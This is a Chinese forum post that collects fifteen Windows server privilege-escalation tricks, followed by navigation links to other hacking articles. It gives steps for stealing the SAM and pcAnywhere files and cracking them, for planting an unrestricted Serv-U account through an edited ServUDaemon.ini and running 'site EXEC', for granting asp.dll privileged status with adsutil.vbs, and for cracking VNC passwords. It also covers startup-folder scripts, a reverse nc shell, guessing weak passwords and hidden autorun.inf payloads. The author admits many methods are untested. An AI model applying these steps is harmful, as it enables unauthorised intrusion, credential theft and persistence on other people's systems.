好多都没有成功,还是发来看看,看看思路,呵呵
以下全部是本人提权时候的总结 很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过的。本人不才,除了第一种方法自己研究的,其他的都是别人的经验总结。希望对朋友有帮助!
1.radmin连接法
条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去。本人从来米成功过。,端口到是给对方打开了。
2.pcanywhere
C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/ 这里下他的GIF文件,在本地安装pcanywhere上去
3.SAM破解
C:/WINNT/system32/config/ 下他的SAM 破解之
4.SU密码夺取
C:/Documents and Settings/All Users/「开始」菜单/程序/
引用:Serv-U,然后本地查看属性,知道路径后,看能否跳转
进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空
[USER=WekweN|1]
Password=
HomeDir=c:/
TimeOut=600
Maintenance=System
Access1=C:/|RWAMELCDP
Access1=d:/|RWAMELCDP
Access1=f:/|RWAMELCDP
SKEYValues=
这个用户具有最高权限,然后我们就可以ftp上去 quote site EXEC xxx 来提升权限
5.c:/winnt/system32/inetsrv/data/
引用:就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行
6.SU溢出提权
这个网上教程N多 不详细讲解了
7.运行Csript
引用:运行"cscript C:/Inetpub/AdminScripts/adsutil.vbs get w3svc/inprocessisapiapps"来提升权限
用这个cscript C:/Inetpub/AdminScripts/adsutil.vbs get w3svc/inprocessisapiapps
查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再将asp.dll加入特权一族
asp.dll是放在c:/winnt/system32/inetsrv/asp.dll (不同的机子放的位置不一定一样)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:/WINNT/system32/idq.dll" "C:/WINNT/system32/inetsrv/httpext.dll" "C:/WINNT/system32/inetsrv/httpodbc.dll" "C:/WINNT/system32/inetsrv/ssinc.dll" "C:/WINNT/system32/msw3prt.dll""c:/winnt/system32/inetsrv/asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了
8.脚本提权
c:/Documents and Settings/All Users/「开始」菜单/程序/启动"写入bat,vbs
9.VNC
这个是小花的文章 HOHO
默认情况下VNC密码存放在HKCU/Software/ORL/WinVNC3/Password
我们可以用vncx4
破解它,vncx4使用很简单,只要在命令行下输入
c:/>vncx4 -W
然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。
10.NC提权
给对方来个NC 但是条件是你要有足够的运行权限 然后把它反弹到自己的电脑上 HOHO OK了
11.社会工程学之GUEST提权
很简单 查看他的拥护 一般来说 看到帐户以后 密码尽量猜 可能用户密码一样 也可能是他QQ号 邮箱号 手机号 尽量看看 HOHO
12.IPC空连接
如果对方真比较白痴的话 扫他的IPC 如果运气好还是弱口令
13.替换服务
这个不用说了吧?个人感觉相当复杂
14.autorun .inf
autorun=xxx.exe 这个=后面自己写 HOHO 加上只读、系统、隐藏属性 传到哪个盘都可以的 不相信他不运行
15.desktop.ini与Folder.htt
引用:首先,我们现在本地建立一个文件夹,名字不重要,进入它,在空白处点右键,选择“自定义文件夹”(xp好像是不行的)一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为Folder setting的文件架与desktop.ini的文件,(如果你看不到,先取消“隐藏受保护的操作系统文件”)然后我们在Folder setting目录下找到Folder.htt文件,记事本打开,在任意地方加入以下代码:
- 推荐阅讯
- 菜鸟必备:PC端口完全解析
- 木马工具详解+入门工具使用
- 论坛权限轻松得!简单获取DVBBS权限
- 人小鬼大的黑客工具——QQ远控精灵
- 黑客技术:DoS和DDoS的攻击方法浅析
- 不可不知!DDoS的攻击原理与防御方法
- 先做黑客再做网管:四.常用黑客软件性质分类
- ASP网站漏洞解析及黑客入侵防范方法
- 一夫当关万夫莫开!记反黑利器:反间谍专家
- 黑客Web欺骗的工作原理和解决方案
- 阅读排行
- 1.千里之行始于足下 黑客技术基础知识讲解
- 2.黑客必学的六条系统命令
- 3.密码攻略 黑客亲手打造QQ密码破解器
- 4.王者风范 2分钟入侵网站全程实录
- 5.黑客新技术 灰鸽子巧妙利用全攻略
- 6.秘籍:网吧入侵全攻略
- 7.菜鸟必看:学习黑客技术的基本环境
- 8.人小鬼大的黑客工具——QQ远控精灵
- 9.先做黑客再做网管:二.黑客应掌握的基本技能
- 10.先做黑客再做网管:一.
- 专题教程
- Windows Server-Windows Server文档-Windows Server新闻-Windows Ser PostgreSQL-PostgreSQL文档-PostgreSQL新闻-PostgreSQL专家
- WebLogic-WebLogic文档-WebLogic新闻-WebLogic专家 FreeBSD-FreeBSD文档-FreeBSD新闻-FreeBSD专家
- Linux-内核 GUI KDE Gnome DNS FTP 安全 安装-Linux专区 Windows-AD IIS ServerCore 虚拟化 安全 HPC-Windows专区
- 大话G游 专题:手机病毒揭密
- ARP攻击防范与解决方案 路由故障处理手册